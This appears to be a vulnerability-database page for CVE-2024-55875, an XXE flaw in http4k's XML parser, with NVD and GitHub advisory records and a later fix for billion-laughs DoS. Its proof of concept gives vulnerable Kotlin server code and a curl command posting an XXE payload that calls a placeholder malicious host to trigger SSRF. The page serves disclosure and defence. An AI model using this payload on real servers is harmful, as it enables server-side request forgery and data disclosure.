  "\u0423\u0440\u043e\u0432\u0435\u043d\u044c \u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438": "\u041a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0438\u0439 \u0443\u0440\u043e\u0432\u0435\u043d\u044c \u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 (\u0431\u0430\u0437\u043e\u0432\u0430\u044f \u043e\u0446\u0435\u043d\u043a\u0430 CVSS 2.0 \u0441\u043e\u0441\u0442\u0430\u0432\u043b\u044f\u0435\u0442 10)\n\u041a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0438\u0439 \u0443\u0440\u043e\u0432\u0435\u043d\u044c \u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 (\u0431\u0430\u0437\u043e\u0432\u0430\u044f \u043e\u0446\u0435\u043d\u043a\u0430 CVSS 3.0 \u0441\u043e\u0441\u0442\u0430\u0432\u043b\u044f\u0435\u0442 9,8)"
}

FKIE_CVE-2024-55875

Vulnerability from fkie_nvd - Published: 2024-12-12 19:15 - Updated: 2026-06-09 11:16

Severity

9.8 (Critical) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Summary

References

	URL	Tags
	security-advisories@github.com	https://github.com/http4k/http4k/blob/25696dff2d90206cc1da42f42a1a8dbcdbcdf18c/core/format/xml/src/main/kotlin/org/http4k/format/Xml.kt#L42-L46
	security-advisories@github.com	https://github.com/http4k/http4k/commit/35297adc6d6aca4951d50d8cdf17ff87a8b19fbc
	security-advisories@github.com	https://github.com/http4k/http4k/security/advisories/GHSA-7mj5-hjjj-8rgw
	134c704f-9b21-4f2e-91b3-4a467353bcc0	https://github.com/http4k/http4k/security/advisories/GHSA-7mj5-hjjj-8rgw

Impacted products

	Vendor	Product	Version

JSON

To clipboard

{
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "http4k is a functional toolkit for Kotlin HTTP applications. Prior to version 6.50.0.0, there is a potential XXE (XML External Entity Injection) vulnerability when http4k handling malicious XML contents within requests, which might allow attackers to read local sensitive information on server, trigger Server-side Request Forgery and even execute code under some circumstances. The original fix shipped in v5.41.0.0 / v4.50.0.0 closed the documented external-entity attack class (SSRF, local-file disclosure, code execution) by setting `ACCESS_EXTERNAL_DTD=\"\"`, `ACCESS_EXTERNAL_SCHEMA=\"\"`, and `isExpandEntityReferences=false` on the default `DocumentBuilderFactory`. A residual gap remained: the parser still accepted documents containing `\u003c!DOCTYPE\u003e` declarations even though external entity resolution was blocked. This left open billion-laughs-style internal entity expansion DoS attacks against any application using `Body.xml()` or `Document.asXmlDocument()` on untrusted XML. v6.50.0.0 closes this residual by adding `disallow-doctype-decl=true` and `FEATURE_SECURE_PROCESSING=true` to `defaultXmlParsingConfig`. Any document containing a `\u003c!DOCTYPE\u003e` is now rejected at parse time."
    },
    {
      "lang": "es",
      "value": "http4k es un conjunto de herramientas funcionales para aplicaciones HTTP de Kotlin. Antes de la versi\u00f3n 5.41.0.0, exist\u00eda una posible vulnerabilidad XXE (inyecci\u00f3n de entidad externa XML) cuando http4k gestionaba contenido XML malicioso dentro de las solicitudes, lo que podr\u00eda permitir a los atacantes leer informaci\u00f3n confidencial local en el servidor, activar Server-side Request Forgery e incluso ejecutar c\u00f3digo en algunas circunstancias. La versi\u00f3n 5.41.0.0 contiene un parche para el problema."
    }
  ],
  "id": "CVE-2024-55875",
  "lastModified": "2026-06-09T11:16:46.530",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 9.8,
          "baseSeverity": "CRITICAL",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "HIGH",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
          "version": "3.1"
        },
        "exploitabilityScore": 3.9,
        "impactScore": 5.9,
        "source": "security-advisories@github.com",
        "type": "Secondary"
      }
    ]
  },
  "published": "2024-12-12T19:15:13.983",
  "references": [
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/http4k/http4k/blob/25696dff2d90206cc1da42f42a1a8dbcdbcdf18c/core/format/xml/src/main/kotlin/org/http4k/format/Xml.kt#L42-L46"
    },
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/http4k/http4k/commit/35297adc6d6aca4951d50d8cdf17ff87a8b19fbc"
    },
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/http4k/http4k/security/advisories/GHSA-7mj5-hjjj-8rgw"
    },
    {
      "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
      "url": "https://github.com/http4k/http4k/security/advisories/GHSA-7mj5-hjjj-8rgw"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Deferred",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-200"
        },
        {
          "lang": "en",
          "value": "CWE-611"
        },
        {
          "lang": "en",
          "value": "CWE-918"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Secondary"
    }
  ]
}

GHSA-7MJ5-HJJJ-8RGW

Vulnerability from github – Published: 2024-12-12 19:22 – Updated: 2026-06-09 10:42

Summary

http4k has a potential XXE (XML External Entity Injection) vulnerability

Details

Summary

Short summary of the problem. Make the impact and severity as clear as possible. For example: An unsafe deserialization vulnerability allows any unauthenticated user to execute arbitrary code on the server.

There is a potential XXE(XML External Entity Injection) vulnerability when http4k handling malicious XML contents within requests, which might allow attackers to read local sensitive information on server, trigger Server-side Request Forgery and even execute code under some circumstances.

Details

Give all details on the vulnerability. Pointing to the incriminated source code is very helpful for the maintainer. https://github.com/http4k/http4k/blob/25696dff2d90206cc1da42f42a1a8dbcdbcdf18c/core/format/xml/src/main/kotlin/org/http4k/format/Xml.kt#L42-L46 XML contents is parsed with DocumentBuilder without security settings on or external entity enabled

PoC

Complete instructions, including specific configuration details, to reproduce the vulnerability.

Example Vulnerable server code:

import org.http4k.core.*
import org.http4k.format.Xml.xml
import org.http4k.server.Netty
import org.http4k.server.asServer
import org.w3c.dom.Document

fun main() {

    val xmlLens = Body.xml().toLens()

    // Create an HTTP handler
    val app: HttpHandler = { request ->
        try {
            // Parse the incoming XML payload to a Document object
            val xmlDocument: Document = xmlLens(request)

            // Extract root element name or other details from the XML
            val rootElementName = xmlDocument.documentElement.nodeName

            // Create a response XML based on the extracted information
            val responseXml = """
                <response>
                    <message>Root element is: $rootElementName</message>
                </response>
            """.trimIndent()

            // Respond with XML
            Response(Status.OK).body(responseXml).header("Content-Type", "application/xml")
        } catch (e: Exception) {
            // Handle invalid XML or other errors
            Response(Status.BAD_REQUEST).body("Invalid XML: ${e.message}")
        }
    }

    // Start the server
    val server = app.asServer(Netty(9000)).start()
    println("Server started on http://localhost:9000")
}

Maven dependency:

<dependencies>
        <dependency>
            <groupId>org.jetbrains.kotlin</groupId>
            <artifactId>kotlin-test-junit5</artifactId>
            <version>1.9.0</version>
            <scope>test</scope>
        </dependency>
        <dependency>
            <groupId>org.junit.jupiter</groupId>
            <artifactId>junit-jupiter-engine</artifactId>
            <version>5.10.0</version>
            <scope>test</scope>
        </dependency>
        <dependency>
            <groupId>org.jetbrains.kotlin</groupId>
            <artifactId>kotlin-stdlib</artifactId>
            <version>1.9.0</version>
        </dependency>

        <dependency>
            <groupId>org.http4k</groupId>
            <artifactId>http4k-core</artifactId>
            <version>5.40.0.0</version>
        </dependency>

        <!-- Http4k XML format -->
        <dependency>
            <groupId>org.http4k</groupId>
            <artifactId>http4k-format-xml</artifactId>
            <version>5.40.0.0</version>
        </dependency>

        <!-- http4k Netty -->
        <dependency>
            <groupId>org.http4k</groupId>
            <artifactId>http4k-server-netty</artifactId>
            <version>5.40.0.0</version>
        </dependency>
    </dependencies>

Exploit payload example to trigger SSRF

curl -X POST http://localhost:9000 -H "Content-Type: application/xml" -d "<?xml version=\"1.0\" encoding=\"UTF-8\"?><!DOCTYPE root [<!ENTITY xxe SYSTEM \"https://replace.with.your.malicious.website/poc\">]><root>&xxe;</root>"

Impact

What kind of vulnerability is it? Who is impacted? The servers that employ this XML parsing feature of http4k are vulnerable to this XXE vulnerability

Follow-up patch — v6.50.0.0 (May 2026)

The original fix shipped in v5.41.0.0 / v4.50.0.0 closed the documented external-entity attack class (SSRF, local-file disclosure, code execution) by setting ACCESS_EXTERNAL_DTD="", ACCESS_EXTERNAL_SCHEMA="", and isExpandEntityReferences=false on the default DocumentBuilderFactory.

A residual gap remained: the parser still accepted documents containing <!DOCTYPE> declarations even though external entity resolution was blocked. This left open billion-laughs-style internal entity expansion DoS attacks against any application using Body.xml() or Document.asXmlDocument() on untrusted XML.

v6.50.0.0 closes this residual by adding disallow-doctype-decl=true and FEATURE_SECURE_PROCESSING=true to defaultXmlParsingConfig. Any document containing a <!DOCTYPE> is now rejected at parse time.

Follow-up affected & fixed versions

Version	Fixed Version
`>= 5.41.0.0, < 6.50.0.0`	6.50.0.0

v6.x users should upgrade to v6.50.0.0. The patch is part of the v6.50.0.0 release; no separate backport is required for the v6 line. Older v5 / v4 users remain on the v5.41.0.0 / v4.50.0.0 fix (external-entity protection); the billion-laughs residual is fixed in those lines only via http4k EE LTS releases — contact enterprise@http4k.org if you need it.

Follow-up timeline

Date/time (UTC)	Notes
31/05/2026 17:12	Follow-up patch merged (commit `c0cfaf5d63`) with new tests for `<!DOCTYPE>` rejection and billion-laughs payload rejection
31/05/2026 18:06	http4k v6.50.0.0 released to Maven Central

Severity

9.8 (Critical)


                  
                    CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "Maven",
        "name": "org.http4k:http4k-format-xml"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "6.50.0.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2024-55875"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-200",
      "CWE-611",
      "CWE-918"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2024-12-12T19:22:01Z",
    "nvd_published_at": "2024-12-12T19:15:13Z",
    "severity": "CRITICAL"
  },
  "details": "### Summary\n_Short summary of the problem. Make the impact and severity as clear as possible. For example: An unsafe deserialization vulnerability allows any unauthenticated user to execute arbitrary code on the server._\n\nThere is a potential XXE(XML External Entity Injection) vulnerability when http4k handling malicious XML contents within requests, which might allow attackers to read local sensitive information on server, trigger Server-side Request Forgery and even execute code under some circumstances.\n\n### Details\n_Give all details on the vulnerability. Pointing to the incriminated source code is very helpful for the maintainer._\nhttps://github.com/http4k/http4k/blob/25696dff2d90206cc1da42f42a1a8dbcdbcdf18c/core/format/xml/src/main/kotlin/org/http4k/format/Xml.kt#L42-L46\nXML contents is parsed with DocumentBuilder without security settings on or external entity enabled\n\n### PoC\n_Complete instructions, including specific configuration details, to reproduce the vulnerability._\n#### Example Vulnerable server code:\n```\nimport org.http4k.core.*\nimport org.http4k.format.Xml.xml\nimport org.http4k.server.Netty\nimport org.http4k.server.asServer\nimport org.w3c.dom.Document\n\nfun main() {\n\n    val xmlLens = Body.xml().toLens()\n\n    // Create an HTTP handler\n    val app: HttpHandler = { request -\u003e\n        try {\n            // Parse the incoming XML payload to a Document object\n            val xmlDocument: Document = xmlLens(request)\n\n            // Extract root element name or other details from the XML\n            val rootElementName = xmlDocument.documentElement.nodeName\n\n            // Create a response XML based on the extracted information\n            val responseXml = \"\"\"\n                \u003cresponse\u003e\n                    \u003cmessage\u003eRoot element is: $rootElementName\u003c/message\u003e\n                \u003c/response\u003e\n            \"\"\".trimIndent()\n\n            // Respond with XML\n            Response(Status.OK).body(responseXml).header(\"Content-Type\", \"application/xml\")\n        } catch (e: Exception) {\n            // Handle invalid XML or other errors\n            Response(Status.BAD_REQUEST).body(\"Invalid XML: ${e.message}\")\n        }\n    }\n\n    // Start the server\n    val server = app.asServer(Netty(9000)).start()\n    println(\"Server started on http://localhost:9000\")\n}\n```\n#### Maven dependency:\n```\n\u003cdependencies\u003e\n        \u003cdependency\u003e\n            \u003cgroupId\u003eorg.jetbrains.kotlin\u003c/groupId\u003e\n            \u003cartifactId\u003ekotlin-test-junit5\u003c/artifactId\u003e\n            \u003cversion\u003e1.9.0\u003c/version\u003e\n            \u003cscope\u003etest\u003c/scope\u003e\n        \u003c/dependency\u003e\n        \u003cdependency\u003e\n            \u003cgroupId\u003eorg.junit.jupiter\u003c/groupId\u003e\n            \u003cartifactId\u003ejunit-jupiter-engine\u003c/artifactId\u003e\n            \u003cversion\u003e5.10.0\u003c/version\u003e\n            \u003cscope\u003etest\u003c/scope\u003e\n        \u003c/dependency\u003e\n        \u003cdependency\u003e\n            \u003cgroupId\u003eorg.jetbrains.kotlin\u003c/groupId\u003e\n            \u003cartifactId\u003ekotlin-stdlib\u003c/artifactId\u003e\n            \u003cversion\u003e1.9.0\u003c/version\u003e\n        \u003c/dependency\u003e\n\n        \u003cdependency\u003e\n            \u003cgroupId\u003eorg.http4k\u003c/groupId\u003e\n            \u003cartifactId\u003ehttp4k-core\u003c/artifactId\u003e\n            \u003cversion\u003e5.40.0.0\u003c/version\u003e\n        \u003c/dependency\u003e\n\n        \u003c!-- Http4k XML format --\u003e\n        \u003cdependency\u003e\n            \u003cgroupId\u003eorg.http4k\u003c/groupId\u003e\n            \u003cartifactId\u003ehttp4k-format-xml\u003c/artifactId\u003e\n            \u003cversion\u003e5.40.0.0\u003c/version\u003e\n        \u003c/dependency\u003e\n\n        \u003c!-- http4k Netty --\u003e\n        \u003cdependency\u003e\n            \u003cgroupId\u003eorg.http4k\u003c/groupId\u003e\n            \u003cartifactId\u003ehttp4k-server-netty\u003c/artifactId\u003e\n            \u003cversion\u003e5.40.0.0\u003c/version\u003e\n        \u003c/dependency\u003e\n    \u003c/dependencies\u003e\n```\n#### Exploit payload example to trigger SSRF\n`curl -X POST http://localhost:9000 -H \"Content-Type: application/xml\" -d \"\u003c?xml version=\\\"1.0\\\" encoding=\\\"UTF-8\\\"?\u003e\u003c!DOCTYPE root [\u003c!ENTITY xxe SYSTEM \\\"https://replace.with.your.malicious.website/poc\\\"\u003e]\u003e\u003croot\u003e\u0026xxe;\u003c/root\u003e\"`\n\n\n### Impact\n_What kind of vulnerability is it? Who is impacted?_\nThe servers that employ this XML parsing feature of http4k are vulnerable to this XXE vulnerability\n\n### Follow-up patch \u2014 v6.50.0.0 (May 2026)\n\nThe original fix shipped in v5.41.0.0 / v4.50.0.0 closed the documented external-entity attack class (SSRF, local-file disclosure, code execution) by setting `ACCESS_EXTERNAL_DTD=\"\"`, `ACCESS_EXTERNAL_SCHEMA=\"\"`, and `isExpandEntityReferences=false` on the default `DocumentBuilderFactory`.\n\nA residual gap remained: the parser still **accepted** documents containing `\u003c!DOCTYPE\u003e` declarations even though external entity resolution was blocked. This left open billion-laughs-style internal entity expansion DoS attacks against any application using `Body.xml()` or `Document.asXmlDocument()` on untrusted XML.\n\n  **v6.50.0.0** closes this residual by adding `disallow-doctype-decl=true` and `FEATURE_SECURE_PROCESSING=true` to `defaultXmlParsingConfig`. Any document containing a `\u003c!DOCTYPE\u003e` is now rejected at parse time.\n\n#### Follow-up affected \u0026 fixed versions\n\n  | Version | Fixed Version |\n  |---------|---------------|\n  | `\u003e= 5.41.0.0, \u003c 6.50.0.0` | **6.50.0.0** |\n\nv6.x users should upgrade to v6.50.0.0. The patch is part of the v6.50.0.0 release; no separate backport is required for the v6 line. Older v5 / v4 users remain on the v5.41.0.0 / v4.50.0.0 fix (external-entity protection); the billion-laughs residual is fixed in those lines only via http4k EE LTS releases \u2014 contact [enterprise@http4k.org](mailto:enterprise@http4k.org) if you need it.\n\n#### Follow-up timeline\n\n  | Date/time (UTC) | Notes |\n  |-----------------|-------|\n  | 31/05/2026 17:12 | Follow-up patch merged (commit [`c0cfaf5d63`](https://github.com/http4k/http4k/commit/c0cfaf5d63)) with new tests for `\u003c!DOCTYPE\u003e` rejection and billion-laughs payload rejection |\n  | 31/05/2026 18:06 | http4k v6.50.0.0 released to Maven Central |",
  "id": "GHSA-7mj5-hjjj-8rgw",
  "modified": "2026-06-09T10:42:52Z",
  "published": "2024-12-12T19:22:01Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/http4k/http4k/security/advisories/GHSA-7mj5-hjjj-8rgw"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-55875"
    },
    {
      "type": "WEB",
      "url": "https://github.com/http4k/http4k/commit/35297adc6d6aca4951d50d8cdf17ff87a8b19fbc"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/http4k/http4k"
    },
    {
      "type": "WEB",
      "url": "https://github.com/http4k/http4k/blob/25696dff2d90206cc1da42f42a1a8dbcdbcdf18c/core/format/xml/src/main/kotlin/org/http4k/format/Xml.kt#L42-L46"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "http4k has a potential XXE (XML External Entity Injection) vulnerability"
}

Sightings

Author	Source	Type	Date	Other

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2024-55875 (GCVE-0-2024-55875)

BDU:2025-00486

FKIE_CVE-2024-55875

GHSA-7MJ5-HJJJ-8RGW

Summary

Details

PoC

Example Vulnerable server code:

Maven dependency:

Exploit payload example to trigger SSRF

Impact

Follow-up patch — v6.50.0.0 (May 2026)

Follow-up affected & fixed versions

Follow-up timeline

Tags

Sightings

Nomenclature